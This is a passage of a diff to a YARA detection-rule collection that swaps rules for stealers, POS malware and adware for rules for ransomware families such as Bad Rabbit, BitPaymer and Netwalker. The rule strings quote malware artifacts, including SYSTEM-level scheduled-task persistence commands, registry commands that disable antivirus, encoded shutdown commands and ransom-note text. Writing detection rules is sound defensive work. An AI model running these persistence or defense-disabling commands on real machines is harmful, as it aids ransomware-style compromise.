ascii + $s9 = "Please enter the password." fullword ascii condition: - ( uint16(0)==0x5025 and filesize <1000KB and ($jat or $jatboss)) or ( uint16(0)==0xcfd0 and $spam and any of ($jat*)) + ( uint16(0)==0x5a4d and filesize <600KB) and all of them } -rule TRELLIX_ARC_Alina_POS_PDB : POS FILE +rule TRELLIX_ARC_Amba_Ransomware : RANSOMWARE FILE { meta: - description = "Rule to detect Alina POS" + description = "Rule to detect Amba Ransomware" author = "Marc Rivero | McAfee ATR Team" - id = "9588aa10-d5e4-55f4-998c-a01503a53d3a" - date = "2013-08-08" + id = "961f2892-e462-55e4-bd96-7dff895cb1e6" + date = "2017-07-03" modified = "2020-08-14" - reference = "https://www.pandasecurity.com/mediacenter/pandalabs/alina-pos-malware/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_alina_pos_pdb.yar#L1-L25" + reference = "https://www.enigmasoftware.com/ambaransomware-removal/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_amba.yar#L1-L41" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "28b0c52c0630c15adcc857d0957b3b8002a4aeda3c7ec40049014ce33c7f67c3" - logic_hash = "9bb8260e3a47567e2460dd474fb74e57987e3d79eb30cdbc2a45b88a16ba1ca2" + hash = "b9b6045a45dd22fcaf2fc13d39eba46180d489cb4eb152c87568c2404aecac2f" + logic_hash = "0830ab49956711d3e6ad64785edcf54146a24756c4ab66384305dc18091867bd" score = 75 - quality = 70 - tags = "POS, FILE" + quality = 68 + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "pos" - malware_family = "Pos:W32/Alina" + malware_type = "ransomware" + malware_family = "Ransom:W32/Amba" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pdb = "\\Users\\dice\\Desktop\\SRC_adobe\\src\\grab\\Release\\Alina.pdb" + $s1 = "64DCRYPT.SYS" fullword wide + $s2 = "32DCRYPT.SYS" fullword wide + $s3 = "64DCINST.EXE" fullword wide + $s4 = "32DCINST.EXE" fullword wide + $s5 = "32DCCON.EXE" fullword wide + $s6 = "64DCCON.EXE" fullword wide + $s8 = "32DCAPI.DLL" fullword wide + $s9 = "64DCAPI.DLL" fullword wide + $s10 = "ICYgc2h1dGRvd24gL2YgL3IgL3QgMA==" fullword ascii + $s11 = "QzpcVXNlcnNcQUJDRFxuZXRwYXNzLnR4dA==" fullword ascii + $s12 = ")!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v)" fullword ascii + $s13 = "RGVmcmFnbWVudFNlcnZpY2U=" + $s14 = "LWVuY3J5cHQgcHQ5IC1wIA==" + $s15 = "LWVuY3J5cHQgcHQ3IC1wIA==" + $s16 = "LWVuY3J5cHQgcHQ2IC1wIA==" + $s17 = "LWVuY3J5cHQgcHQzIC1wIA==" condition: - uint16(0)==0x5a4d and filesize <100KB and any of them + ( uint16(0)==0x5a4d and filesize <3000KB and (8 of them )) or ( all of them ) } -rule TRELLIX_ARC_Shifu : FINANCIAL +import "pe" + +rule TRELLIX_ARC_Badbunny : RANSOMWARE FILE { meta: - description = "No description has been set in the source file - Trellix ARC" - author = "McAfee Labs" - id = "81e9ad25-1df0-5196-be8b-1d1d5d8e4387" - date = "2024-09-01" + description = "Bad Rabbit Ransomware" + author = "Christiaan Beek" + id = "190ee396-4c26-54f7-baac-bb45e3587488" + date = "2017-10-24" modified = "2020-08-14" - reference = "https://blogs.mcafee.com/mcafee-labs/japanese-banking-trojan-shifu-combines-malware-tools/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_Shifu.yar#L1-L24" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_BadRabbit.yar#L3-L47" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "dfa6165f8d2750330c71dedbde293780d2bb27e8eb3635e47ca770ff7b9a9d63" + logic_hash = "2879b8dc1ca0e86253354ac24b56d950878b23215b503da9b1d5faabd2c4bf9d" score = 75 - quality = 70 - tags = "FINANCIAL" - malware_type = "financial" - malware_family = "Backdoor:W32/Shifu" + quality = 45 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/BadRabbit" actor_type = "Cybercrime" actor_group = "Unknown" + hash1 = "8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93" strings: - $b = "RegCreateKeyA" - $a = "CryptCreateHash" - $c = {2F 00 63 00 20 00 73 00 74 00 61 00 72 00 74 00 20 00 22 00 22 00 20 00 22 00 25 00 73 00 22 00 20 00 25 00 73 00 00 00 00 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 00 72 00 75 00 6E} - $d = {53 00 6E 00 64 00 56 00 6F 00 6C 00 2E 00 65 00 78 00 65} - $e = {52 00 65 00 64 00 69 00 72 00 65 00 63 00 74 00 45 00 58 00 45} + $x1 = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" fullword wide + $x2 = "need to do is submit the payment and get the decryption password." fullword ascii + $s3 = "If you have already got the password, please enter it below." fullword ascii + $s4 = "dispci.exe" fullword wide + $s5 = "\\\\.\\GLOBALROOT\\ArcName\\multi(0)disk(0)rdisk(0)partition(1)" fullword wide + $s6 = "Run DECRYPT app at your desktop after system boot" fullword ascii + $s7 = "Enter password#1: " fullword wide + $s8 = "Enter password#2: " fullword wide + $s9 = "C:\\Windows\\cscc.dat" fullword wide + $s10 = "schtasks /Delete /F /TN %ws" fullword wide + $s11 = "Password#1: " fullword ascii + $s12 = "\\AppData" fullword wide + $s13 = "Disk decryption completed" fullword wide + $s14 = "Files decryption completed" fullword wide + $s15 = "http://diskcryptor.net/" fullword wide + $s16 = "Your personal installation key#1:" fullword ascii + $s17 = ".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg." wide + $s18 = "Disable your anti-virus and anti-malware programs" fullword wide + $s19 = "bootable partition not mounted" fullword ascii condition: - all of them + ( uint16(0)==0x5a4d and filesize <400KB and pe.imphash()=="94f57453c539227031b918edd52fc7f1" and (1 of ($x*) or 4 of them )) or ( all of them ) } -rule TRELLIX_ARC_Screenlocker_5H311_1Nj3C706 : SCREENLOCKER FILE +import "pe" + +rule TRELLIX_ARC_Badrabbit_Ransomware : RANSOMWARE FILE { meta: - description = "Rule to detect the screenlocker 5h311_1nj3c706" + description = "Rule to detect Bad Rabbit Ransomware" author = "Marc Rivero | McAfee ATR Team" - id = "50bbe8e1-4721-5277-b786-d2a2d9acf917" - date = "2018-08-07" + id = "d6e78c14-0913-5eed-be15-a6d1a8cd1a8d" + date = "2024-09-01" modified = "2020-08-14" - reference = "https://twitter.com/demonslay335/status/1038060120461266944" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_screenlocker_5h311_1nj3c706.yar#L1-L33" + reference = "https://securelist.com/bad-rabbit-ransomware/82851/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_BadRabbit.yar#L49-L101" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "016ee638bd4fccd5ca438c2e0abddc4b070f59269c08f11c5313ba9c37190718" - logic_hash = "61b4495841c77053ba2631f087197719f3ee45cd93add022f23b87ece8563619" + logic_hash = "7536f021ce7fede0f1a2bf2f4ebc7d6e7269a6dd63005cab1fc6a309a71c61c0" score = 75 - quality = 70 - tags = "SCREENLOCKER, FILE" - rule_version = "v1" - malware_type = "screenlocker" - malware_family = "ScreenLocker:W32/5h311_1nj3c706" + quality = 43 + tags = "RANSOMWARE, FILE" + malware_type = "ransomware" + malware_family = "Ransom:W32/BadRabbit" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $s1 = "C:\\Users\\Hoang Nam\\source\\repos\\WindowsApp22\\WindowsApp22\\obj\\Debug\\WindowsApp22.pdb" fullword ascii - $s2 = "cmd.exe /cREG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\ActiveDesktop /v NoChangingWallPaper /t REG_DWOR" wide - $s3 = "C:\\Users\\file1.txt" fullword wide - $s4 = "C:\\Users\\file2.txt" fullword wide - $s5 = "C:\\Users\\file.txt" fullword wide - $s6 = " /v Wallpaper /t REG_SZ /d %temp%\\IMG.jpg /f" fullword wide - $s7 = " /v DisableAntiSpyware /t REG_DWORD /d 1 /f" fullword wide - $s8 = "All your file has been locked. You must pay money to have a key." fullword wide - $s9 = "After we receive Bitcoin from you. We will send key to your email." fullword wide + $s1 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\" -id %u && exit\"" fullword wide + $s2 = "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\" fullword wide + $s3 = "process call create \"C:\\Windows\\System32\\rundll32.exe" fullword wide + $s4 = "need to do is submit the payment and get the decryption password." fullword wide + $s5 = "schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" fullword wide + $s6 = "rundll32 %s,#2 %s" fullword ascii + $s7 = " \\\"C:\\Windows\\%s\\\" #1 " fullword wide + $s8 = "Readme.txt" fullword wide + $s9 = "wbem\\wmic.exe" fullword wide + $s10 = "SYSTEM\\CurrentControlSet\\services\\%ws" fullword wide + $og1 = { 39 74 24 34 74 0a 39 74 24 20 0f 84 9f } + $og2 = { 74 0c c7 46 18 98 dd 00 10 e9 34 f0 ff ff 8b 43 } + $og3 = { 8b 3d 34 d0 00 10 8d 44 24 28 50 6a 04 8d 44 24 } + $oh1 = { 39 5d fc 0f 84 03 01 00 00 89 45 c8 6a 34 8d 45 } + $oh2 = { e8 14 13 00 00 b8 ff ff ff 7f eb 5b 8b 4d 0c 85 } + $oh3 = { e8 7b ec ff ff 59 59 8b 75 08 8d 34 f5 48 b9 40 } + $oj4 = { e8 30 14 00 00 b8 ff ff ff 7f 48 83 c4 28 c3 48 } + $oj5 = { ff d0 48 89 45 e0 48 85 c0 0f 84 68 ff ff ff 4c } + $oj6 = { 85 db 75 09 48 8b 0e ff 15 34 8f 00 00 48 8b 6c } + $ok1 = { 74 0c c7 46 18 c8 4a 40 00 e9 34 f0 ff ff 8b 43 } + $ok2 = { 68 f8 6c 40 00 8d 95 e4 f9 ff ff 52 ff 15 34 40 } + $ok3 = { e9 ef 05 00 00 6a 10 58 3b f8 73 30 8b 45 f8 85 } condition: - uint16(0)==0x5a4d and filesize <200KB and all of them + uint16(0)==0x5a4d and filesize <1000KB and ( all of ($s*) and all of ($og*)) or all of ($oh*) or all of ($oj*) or all of ($ok*) } -rule TRELLIX_ARC_Masslogger_Stealer : STEALER FILE +rule TRELLIX_ARC_Termite_Ransomware : RANSOMWARE FILE { meta: - description = "Rule to detect unpacked MassLogger stealer" - author = "Marc Rivero | McAfee ATR Team" - id = "c3a40108-3f0c-5949-9201-95c3c38b352a" - date = "2020-07-02" - modified = "2020-08-14" - reference = "https://urlhaus.abuse.ch/browse/signature/MassLogger/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_masslogger_stealer.yar#L1-L63" + description = "Rule to detect the Termite Ransomware" + author = "McAfee ATR Team" + id = "521ec8ee-a54c-57c3-9437-a2ef7f8ed4ca" + date = "2018-08-28" + modified = "2020-10-12" + reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_termite.yar#L1-L32" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "343873155b6950386f7d9bcd8d2b2e81088521aedf8ff1333d20229426d8145c" - logic_hash = "476b3f3a54a4616058a2aef01adbe429a38eacc8ee58881d31bd28e795a27575" + hash = "021ca4692d3a721af510f294326a31780d6f8fcd9be2046d1c2a0902a7d58133" + logic_hash = "e5c01e8377957fa25cf6c2031c2680e802b0082a36f50b97b4e488c5bf40e968" score = 75 - quality = 66 - tags = "STEALER, FILE" + quality = 20 + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "stealer" - malware_family = "Stealer:W32/MassLogger" + malware_type = "ransomware" + malware_family = "Ransom:W32/Termite" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pattern_0 = { 6437 3e2585829c88 ec ec 1bc8 } - $pattern_1 = { d7 b9513e1ba7 195ab6 e6df 7e2a 5a b6cc } - $pattern_2 = { 80aee281aae280 8ee2 808ce2808ee2808e e280 ae 00436f 6e } - $pattern_3 = { 6d e586 4c 40 } - $pattern_4 = { e281 ab e280 8ee2 80aee281aae280 8ee2 } - $pattern_5 = { 6c 69636b65644576 656e 7441 7267 7300 } - $pattern_6 = { 6e 7e81 d86aaf 61 93 7c2b 832b62 } - $pattern_7 = { 8b1c87 e7ed 24a2 3218 73df 53 } - $pattern_8 = { ee 9a357f9a475399 3188eef97d50 3f ef c9 } - $pattern_9 = { 44 a2???????? 92 7526 42 208fb5ca7050 } - $pattern_10 = { f2bbafb0d5f8 d524 0d48c906ba 7977 5d } - $pattern_11 = { 748f 46 4e 49 2af2 ee 9a357f9a475399 } - $pattern_12 = { 237ddb e200 95 46 99 37 } - $pattern_13 = { d9ae1d19ec3b 01db c5615c ec } - $pattern_14 = { 304a8a e2f4 bde7a84f79 c038d3 197ceae6 } - $pattern_15 = { 291f ff84c3bd55d8dc f331f2 1a3a 9c 7d78 } - $pattern_16 = { 3f 7af1 77a2 24ae 7ff3 } - $pattern_17 = { d1655d 7236 3873c1 b59e } - $pattern_18 = { 2aff 95 55 28ff 94 53 } - $pattern_19 = { e6b1 43 08d2 ef 43 3c38 } - $pattern_20 = { 6964427275736800 43 6f 6c 6f 7200 e281 } - $pattern_21 = { 37 005400a7 877f08 54 00e1 875303 5c } - $pattern_22 = { 6a45 e42c d3ba76c4f058 ce 3037 } - $pattern_23 = { b59e 59 f1 f1 } - $pattern_24 = { 7988 cd09 91 0099664e0391 008288490061 008c88d3099900 } - $pattern_25 = { 1e e3c2 00ff 698876be8fb365b13eb7 45 } - $pattern_26 = { 3d4c9deadf 57 ddeb 97 } - $pattern_27 = { e280 8ee2 808ee281aee280 8ee2 81ace281ace280ade280ab e281 } - $pattern_28 = { 4d 9c 8e5753 32414f d28a7173e2c4 7ee4 d9ae1d19ec3b } - $pattern_29 = { 7472 69704d656e755f 53 61 } - $pattern_30 = { 79bc fa ad 49 } - $pattern_31 = { 875303 5c 00140a 37 005c00a7 } - $pattern_32 = { 7265 5f 43 6c 69636b00746f6f 6c 53 } - $pattern_33 = { 36e633 2b2b 3673d1 d480 124d2d } - $pattern_34 = { 19b3e7ab29db 51 e1f3 dd3a 266f b884c4b53b } - $pattern_35 = { 7467 43 f332d2 84bf3df2e66b 4a ba5a20d9f5 3dbf2a3753 } - $pattern_36 = { f271f3 8877f7 a8e5 6437 3e2585829c88 } - $pattern_37 = { ce 84604c 3f 8cc6 56 bf165fdec5 4a } - $pattern_38 = { ad 49 a2???????? 4c e15b 8b1c87 } - $pattern_39 = { 3400 b687 bc083c00cd 87ce 083400 } + $s1 = "C:\\Windows\\SysNative\\mswsock.dll" fullword ascii + $s2 = "C:\\Windows\\SysWOW64\\mswsock.dll" fullword ascii + $s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Termite.exe" fullword ascii + $s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Payment.exe" fullword ascii + $s5 = "C:\\Windows\\Termite.exe" fullword ascii + $s6 = "\\Shell\\Open\\Command\\" fullword ascii + $s7 = "t314.520@qq.com" fullword ascii + $s8 = "(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii condition: - 7 of them and filesize <3834880 + ( uint16(0)==0x5a4d and filesize <6000KB) and all of them } -rule TRELLIX_ARC_Nionspy : FILEINFECTOR FILE +rule TRELLIX_ARC_Bitpaymer_Ransomware : RANSOMWARE FILE { meta: - description = "Triggers on old and new variants of W32/NionSpy file infector" - author = "Trellix ARC Team" - id = "86051ef8-a18b-553c-b06c-490f8d6df5cf" - date = "2024-09-01" + description = "Rule to detect BitPaymer Ransomware" + author = "Marc Rivero | McAfee ATR Team" + id = "20b91cf2-2a84-55d9-8230-90d7b20a461f" + date = "2019-11-08" modified = "2020-08-14" - reference = "https://blogs.mcafee.com/mcafee-labs/taking-a-close-look-at-data-stealing-nionspy-file-infector" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_NionSpy.yar#L1-L25" + reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/spanish-mssp-targeted-by-bitpaymer-ransomware/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Bitpaymer.yar#L1-L72" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "982ba52f39352aee9e2d2dcadfb0816c439e92d0e5947afa7860630720913742" + logic_hash = "527cdbdf51e6f3f5d58e805cf4a1bc09c9d24880c2323046acef6ee03c92d62f" score = 75 - quality = 70 - tags = "FILEINFECTOR, FILE" - malware_type = "fileinfector" - malware_family = "FileInfector:W32/NionSpy" + quality = 66 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/BitPaymer" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $variant2015_infmarker = "aCfG92KXpcSo4Y94BnUrFmnNk27EhW6CqP5EnT" - $variant2013_infmarker = "ad6af8bd5835d19cc7fdc4c62fdf02a1" - $variant2013_string = "%s?cstorage=shell&comp=%s" + $s1 = "IEncrypt.dll" fullword wide + $op0 = { e8 5f f3 ff ff ff b6 e0 } + $op1 = { e8 ad e3 ff ff 59 59 8b 75 08 8d 34 f5 38 eb 42 } + $op2 = { e9 45 ff ff ff 33 ff 8b 75 0c 6a 04 e8 c1 d1 ff } + $pdb = "S:\\Work\\_bin\\Release-Win32\\wp_encrypt.pdb" fullword ascii + $oj0 = { 39 74 24 34 75 53 8d 4c 24 18 e8 b8 d1 ff ff ba } + $oj1 = { 5f 8b c6 5e c2 08 00 56 8b f1 8d 4e 34 e8 91 af } + $oj2 = { 8b cb 8d bd 50 ff ff ff 8b c1 89 5f 04 99 83 c1 } + $t1 = ".C:\\aaa_TouchMeNot_.txt" fullword wide + $ok0 = { e8 b5 34 00 00 ff 74 24 18 8d 4c 24 54 e8 80 39 } + $ok1 = { 8b 5d 04 33 ff 8b 44 24 34 89 44 24 5c 85 db 7e } + $ok2 = { 55 55 ff 74 24 20 8d 4c 24 34 e8 31 bf 00 00 55 } + $random = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+" fullword ascii + $oi0 = { a1 04 30 ac 00 8b ce 0f af c2 03 c0 99 8b e8 89 } + $oi1 = { e8 64 a2 ff ff 85 c0 74 0c 8d 4d d8 51 ff 35 64 } + $oi2 = { c7 03 d4 21 ac 00 e8 86 53 00 00 89 73 10 89 7b } + $ou0 = { e8 64 a2 ff ff 85 c0 74 0c 8d 4d d8 51 ff 35 60 } + $ou1 = { a1 04 30 04 00 8b ce 0f af c2 03 c0 99 8b e8 89 } + $ou2 = { 8d 4c 24 10 e8 a0 da ff ff 68 d0 21 04 00 8d 4c } + $oa1 = { 56 52 ba 00 10 0c 00 8b f1 e8 28 63 00 00 8b c6 } + $oa2 = { 81 3d 50 30 0c 00 53 c6 d2 43 56 8b f1 75 23 ba } + $oy0 = { c7 06 cc 21 a6 00 c7 46 08 } + $oy1 = { c7 06 cc 21 a6 00 c7 46 08 } + $oy2 = { c7 06 cc 21 a6 00 c7 46 08 } + $oh1 = { e8 74 37 00 00 a3 00 30 fe 00 8d 4c 24 1c 8d 84 } + $oh2 = { 56 52 ba 00 10 fe 00 8b f1 e8 28 63 00 00 8b c6 } condition: - uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550 and 1 of ($variant*) + ( uint16(0)==0x5a4d and filesize <1000KB) and ($s1 and all of ($op*)) or ($pdb and all of ($oj*)) or ($t1 and all of ($ok*)) or ($random and all of ($oi*)) or ($random and all of ($ou*)) or ($random and all of ($oa*) and $ou0) or ($random and all of ($oy*)) or ($random and all of ($oh*)) or ($random and $ou0) or ($random and $oi1) } -rule TRELLIX_ARC_Malw_Browser_Fox_Adware : ADWARE FILE +import "pe" + +rule TRELLIX_ARC_Netwalker_Ransomware : RANSOMWARE FILE { meta: - description = "Rule to detect Browser Fox Adware based on the PDB reference" - author = "Marc Rivero | McAfee ATR Team" - id = "67d20c3a-4e9d-5fbf-b26a-d7b5fb270d12" - date = "2015-01-15" - modified = "2020-08-14" - reference = "https://www.sophos.com/en-us/threat-center/threat-analyses/adware-and-puas/Browse%20Fox.aspx" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_browser_fox_adware.yar#L1-L25" + description = "Rule to detect Netwalker ransomware" + author = "McAfee ATR Team" + id = "6fe75a64-77b8-5cb8-9365-a5336d4d1617" + date = "2020-03-30" + modified = "2020-11-20" + reference = "https://www.ccn-cert.cni.es/comunicacion-eventos/comunicados-ccn-cert/9802-publicado-un-informe-de-codigo-danino-sobre-netwalker.html" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_netwalker.yar#L3-L28" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "c6f3d6024339940896dd18f32064c0773d51f0261ecbee8b0534fdd9a149ac64" - logic_hash = "462a05de46ec0d710cac80a05d4935279a43f49cbd5ef49c072f277982a76fce" + logic_hash = "11da4b57f8d9ed1fdf053053a51870af2cbf4062cc1340087ee70c3e92a1baf6" score = 75 quality = 70 - tags = "ADWARE, FILE" + tags = "RANSOMWARE, FILE" rule_version = "v1" - malware_type = "adware" - malware_family = "Adware:W32/BrowserFox" - actor_type = "Cybercrime" - actor_group = "Unknown" + malware_type = "ransomware" + note = "The rule doesn't detect the samples packed with UPX" strings: - $pdb = "\\Utilities\\130ijkfv.o4g\\Desktop\\Desktop.OptChecker\\bin\\Release\\ BooZaka.Opt" + $pattern = { 8B????8B????89??C7????????????EB??8B????52E8????????83????8B????8B??5DC3CCCCCCCCCCCCCCCCCCCCCCCC558B??83????C7????????????83??????74??83??????72??83??????75??8B????E9????????C7????????????8B????33??B9????????F7??83????89????8B????8B????8D????51E8????????83????89????83??????0F84????????C7????????????C7????????????C6??????C6??????C6??????8B????3B????0F84????????8B????2B????39????73??8B????89????EB??8B????2B????89????8B????89????C7????????????8B????03????8B????2B??89????74??83??????7E??83??????7D??C7????????????8B????03????89????8B????518B????03????528B????03????50E8????????83????8B????03????89????83??????75??6A??8D????528B????03????50E8????????83????8B????83????89????8B????03????89????E9????????8B????8B????89??83??????74??8B????52E8????????83????8B????89??C7????????????8B????8B??5DC3CCCCCCCC558B??51B8????????6B????8B????0FB6????B9????????C1????8B????0FB6????C1????0B??BA????????D1??8B????0FB6????C1????0B??B9????????6B????8B????0FB6????C1????0B??B9????????C1????8B????89????B8????????6B????8B????0FB6??????B9????????C1????8B????0FB6??????C1????0B??BA????????D1??8B????0FB6??????C1????0B??B9????????6B????8B????0FB6??????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????B9????????6B????8B????0FB6??????BA????????C1????8B????0FB6??????C1????0B??B8????????D1??8B????0FB6??????C1????0B??BA????????6B????8B????0FB6??????C1????0B??BA????????6B????8B????89????81????????????75??8B????83????89????C7????????????EB??C7????????????B9????????6B????8B????0FB6????BA????????C1????8B????0FB6????C1????0B??B8????????D1??8B????0FB6????C1????0B??BA????????6B????8B????0FB6????C1????0B??BA????????C1????8B????89????B9????????6B????8B????0FB6??????BA????????C1????8B????0FB6??????C1????0B??B8????????D1??8B????0FB6??????C1????0B??BA????????6B????8B????0FB6??????C1????0B??BA????????6B????8B????89????B8????????6B????8B????0FB6??????B9????????C1????8B????0FB6??????C1????0B??BA????????D1??8B????0FB6??????C1????0B??B9????????6B????8B????0FB6??????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????B9????????6B????8B????0FBE????BA????????C1????8B????0FBE????C1????0B??B8????????D1??8B????0FBE????C1????0B??BA????????6B????8B????0FBE????C1????0B??BA????????6B????8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????C1????8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????D1??8B????89????B8????????6B????8B????0FBE??????B9????????C1????8B????0FBE??????C1????0B??BA????????D1??8B????0FBE??????C1????0B??B9????????6B????8B????0FBE??????C1????0B??B9????????6B????8B????89????8B??5DC3CCCCCC558B??B8????????6B????8B????C7????????????B8????????6B????8B????C7????????????B8????????6B????8B????0FB6????B9????????C1????8B????0FB6????C1????0B??BA????????D1??8B????0FB6????C1????0B??B9????????6B????8B????0FB6????C1????0B??B9????????6B????8B????89????BA????????6B????8B????0FB6??????B8????????C1????8B????0FB6??????C1????0B??B9????????D1??8B????0FB6??????C1????0B??B8????????6B????8B????0FB6??????C1????0B??B8????????6B????8B????89????5DC3CCCCCC558B??83????83??????75??E9????????8B????508D????51E8????????83????BA????????6B????8B????8B????83????B8????????6B????8B????89????B9????????6B????8B????83??????75??B9????????6B????8B????8B????83????BA????????6B????8B????89????83??????77??C7????????????EB??8B????83????89????8B????3B????73??8B????03????0FB6??8B????0FB6??????33??8B????03????88??EB??EB??C7????????????EB??8B????83????89????83??????73??8B????03????0FB6??8B????0FB6??????33??8B????03????88??EB??8B????83????89????8B????83????89????8B????83????89????E9????????8B??5DC3CCCCCCCCCCCCCCCC558B??83????C7????????????EB??8B????83????89????83??????7D??8B????8B????8B????8B????89??????EB??C7????????????EB??8B????83????89????83??????0F8E????????B9????????6B????B8????????C1????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????C1????B8????????6B????8B??????03??????B8????????C1????89??????B9????????C1????BA????????C1????8B??????33??????C1????B9????????C1????BA????????C1????8B??????33??????C1????0B??BA????????C1????89??????B8????????6B????BA????????C1????8B??????03??????B9????????6B????89??????B8????????6B????BA????????6B????8B??????33??????C1????BA????????6B????BA????????6B????8B??????33??????C1????0B??BA????????6B????89??????B9????????C1????BA????????6B????8B??????03??????BA????????C1????89??????B8????????C1????B9????????C1????8B??????33??????C1????B8????????C1????B9????????C1????8B??????33??????C1????0B??B9????????C1????89??????BA????????C1????B8????????6B????8B??????03??????B8????????C1????89??????B9????????6B????B8????????C1????8B??????33??????C1????BA????????6B????BA????????C1????8B??????33??????C1????0B??BA????????6B????89??????B9????????6B????B8????????6B????8B??????03??????B8????????6B????89??????BA????????6B????B9????????6B????8B??????33??????C1????B9????????6B????B9????????6B????8B??????33??????C1????0B??B9????????6B????89??????B8????????C1????B9????????6B????8B??????03??????B9????????C1????89??????BA????????6B????B9????????C1????8B??????33??????C1????B8????????6B????B8????????C1????8B??????33??????C1????0B??B8????????6B????89??????BA????????6B????B9????????6B????8B??????03??????B9????????6B????89??????B8????????6B????BA????????6B????8B??????33??????C1????BA????????6B????BA????????6B????8B??????33??????C1????0B??BA????????6B????89??????B9????????D1??BA????????6B????8B??????03??????BA????????D1??89??????B8????????6B????BA????????D1??8B??????33??????C1????B9????????6B????B9????????D1??8B??????33??????C1????0B??B9????????6B????89??????B8????????6B????BA????????6B????8B??????03??????BA????????6B????89??????B9????????6B????B8????????6B????8B??????33??????C1????B8????????6B????B8????????6B????8B??????33??????C1????0B??B8????????6B????89??????BA????????D1??B8????????6B????8B??????03??????B8????????D1??89??????B9????????6B????B8????????D1??8B??????33??????C1????BA????????6B????BA??????